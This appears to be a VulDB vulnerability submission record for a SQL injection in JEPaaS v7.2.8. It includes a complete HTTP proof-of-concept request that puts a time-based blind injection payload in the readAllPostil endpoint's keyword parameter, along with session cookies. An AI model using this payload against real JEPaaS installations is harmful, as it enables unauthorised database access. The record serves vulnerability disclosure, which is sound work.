| tiêu đề | JEPaaS v7.2.8 SQL Injection |
|---|
| Mô tả | https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md
The /je/postil/postil/readAllPostil interface in JEPaaS uses string concatenation in SQL statements, resulting in a SQL injection vulnerability
The request is as follows:
POST /je/postil/postil/readAllPostil?keyword=%25'+AND+IF(LENGTH(database())=6,SLEEP(2),0)+AND+'%25'%3d' HTTP/1.1
Host:
Cookie: je-local-lang=zh_CN; JSESSIONID=BDFF4DEC4216AE260303D79CBE35CA06; phone=admin; password=TVRJeg==; authorization=TIUxAb8r8IilqFzx9Xg
Content-Type: application/json; charset=utf-8
Content-Length: 2
{}
|
|---|
| Nguồn | ⚠️ https://github.com/c3p0ooo-Yiqiyin/JEPaaS-readAllPostil-SQL-Injection-Vulnerability/blob/main/README.md |
|---|
| Người dùng | c3p0ooo_Yiqiyin (UID 44113) |
|---|
| Đệ trình | 05/12/2025 10:44 (cách đây 5 các tháng) |
|---|
| Kiểm duyệt | 14/12/2025 13:09 (9 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 336412 [ketr JEPaaS đến 7.2.8 readAllPostil keyWord Tiêm SQL] |
|---|
| điểm | 20 |
|---|